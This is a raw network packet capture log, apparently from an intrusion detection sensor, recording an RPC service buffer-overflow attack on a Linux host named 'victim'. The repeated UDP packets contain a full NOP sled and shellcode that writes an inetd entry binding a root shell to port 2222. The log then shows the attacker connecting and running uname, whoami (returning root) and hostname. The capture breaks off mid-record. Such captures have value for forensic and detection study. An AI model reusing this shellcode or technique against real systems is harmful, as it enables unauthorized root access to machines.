11/14-16:58:36.917513 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x62 192.168.20.11:902 -> 192.168.128.50:111 UDP TTL:63 TOS:0x0 ID:44507 IpLen:20 DgmLen:84 Len: 64 3C F6 DE D3 00 00 00 00 00 00 00 02 00 01 86 A0 <............... 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 04 93 F3 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:36.918010 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x46 192.168.128.50:111 -> 192.168.20.11:902 UDP TTL:64 TOS:0x0 ID:1163 IpLen:20 DgmLen:56 Len: 36 3C F6 DE D3 00 00 00 01 00 00 00 00 00 00 00 00 <............... 00 00 00 00 00 00 00 00 00 00 03 6C ...........l =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:36.919494 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44508 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:42.310583 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44510 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.280789 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4A 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44512 IpLen:20 DgmLen:60 DF ******S* Seq: 0xCAAA5BFC Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 115105103 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.280877 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4A 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1165 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xC9B2D9B6 Ack: 0xCAAA5BFD Win: 0x77C4 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 34781 115105103 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.281809 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44513 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5BFD Ack: 0xC9B2D9B7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105103 34781 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.282487 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x51 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44514 IpLen:20 DgmLen:67 DF ***AP*** Seq: 0xCAAA5BFD Ack: 0xC9B2D9B7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105103 34781 75 6E 61 6D 65 20 2D 61 3B 20 70 77 64 3B 0A uname -a; pwd;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.282573 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1166 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xC9B2D9B7 Ack: 0xCAAA5C0C Win: 0x77C4 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34781 115105103 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.292970 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x48 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1167 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xC9B2D9B7 Ack: 0xCAAA5C0C Win: 0x77C4 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34782 115105103 62 61 73 68 23 20 bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.293622 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44516 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C0C Ack: 0xC9B2D9BD Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105104 34782 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.293702 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x51 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1168 IpLen:20 DgmLen:67 DF ***AP*** Seq: 0xC9B2D9BD Ack: 0xCAAA5C0C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34782 115105104 75 6E 61 6D 65 20 2D 61 3B 20 70 77 64 3B 0A uname -a; pwd;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.299647 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44517 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C0C Ack: 0xC9B2D9CC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105105 34782 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.299751 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x8E 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1169 IpLen:20 DgmLen:128 DF ***AP*** Seq: 0xC9B2D9CC Ack: 0xCAAA5C0C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 34783 115105105 4C 69 6E 75 78 20 76 69 63 74 69 6D 20 32 2E 32 Linux victim 2.2 2E 31 32 2D 32 30 20 23 31 20 4D 6F 6E 20 53 65 .12-20 #1 Mon Se 70 20 32 37 20 31 30 3A 34 30 3A 33 35 20 45 44 p 27 10:40:35 ED 54 20 31 39 39 39 20 69 36 38 36 20 75 6E 6B 6E T 1999 i686 unkn 6F 77 6E 0A 2F 0A 62 61 73 68 23 20 own./.bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:44.310116 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44519 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C0C Ack: 0xC9B2DA18 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105106 34783 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.026918 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x49 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44527 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0xCAAA5C0C Ack: 0xC9B2DA18 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105377 34783 77 68 6F 61 6D 69 0A whoami. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.027086 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1170 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA18 Ack: 0xCAAA5C13 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35056 115105377 77 w =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.040532 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44529 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C13 Ack: 0xC9B2DA19 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105379 35056 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.040648 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x48 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1171 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xC9B2DA19 Ack: 0xCAAA5C13 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35057 115105379 68 6F 61 6D 69 0A hoami. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.060514 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44531 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C13 Ack: 0xC9B2DA1F Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105381 35057 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.060608 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x4D 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1172 IpLen:20 DgmLen:63 DF ***AP*** Seq: 0xC9B2DA1F Ack: 0xCAAA5C13 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35059 115105381 72 6F 6F 74 0A 62 61 73 68 23 20 root.bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.079999 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44533 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C13 Ack: 0xC9B2DA2A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105383 35059 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:47.301036 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x456 192.168.20.11:903 -> 192.168.128.50:876 UDP TTL:63 TOS:0x0 ID:44534 IpLen:20 DgmLen:1096 Len: 1076 3C F6 DE EE 00 00 00 00 00 00 00 02 00 04 93 F3 <............... 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 03 FD 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 28 5E 8D 5E 10 89 1E 83 C3 08 89 5E 04 ...(^.^.......^. 83 C3 03 89 5E 08 83 EB 0B 8D 0E 89 CA 33 C0 89 ....^........3.. 46 0C 88 46 17 88 46 1A B0 0B CD 80 E8 D3 FF FF F..F..F......... FF 31 38 20 4A 61 6E 20 31 39 39 38 2D 2D 73 74 .18 Jan 1998--st 72 2F 62 69 6E 2F 73 68 28 2D 63 29 2F 62 69 6E r/bin/sh(-c)/bin 2F 65 63 68 6F 20 27 32 32 32 32 20 20 20 20 20 /echo '2222 20 20 20 73 74 72 65 61 6D 20 20 74 63 70 20 20 stream tcp 20 20 20 6E 6F 77 61 69 74 20 20 72 6F 6F 74 20 nowait root 20 20 20 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 /bin/sh sh -i 27 3E 3E 20 2F 74 6D 70 2F 68 3B 2F 75 73 72 2F '>> /tmp/h;/usr/ 73 62 69 6E 2F 69 6E 65 74 64 20 2F 74 6D 70 2F sbin/inetd /tmp/ 68 20 26 23 90 D2 F2 FF BF D2 F2 FF BF D2 F2 FF h &#............ BF D2 F2 FF BF D2 F2 FF BF 00 00 00 ............ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.887650 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x4B 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44544 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0xCAAA5C13 Ack: 0xC9B2DA2A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 115105563 35059 68 6F 73 74 6E 61 6D 65 0A hostname. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.887782 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43 192.168.128.50:2222 -> 192.168.20.11:1671 TCP TTL:64 TOS:0x0 ID:1174 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xC9B2DA2A Ack: 0xCAAA5C1C Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 35242 115105563 68 h =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/14-16:58:48.909452 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x42 192.168.20.11:1671 -> 192.168.128.50:2222 TCP TTL:63 TOS:0x0 ID:44546 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCAAA5C1C Ack: 0xC9B2DA2B Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 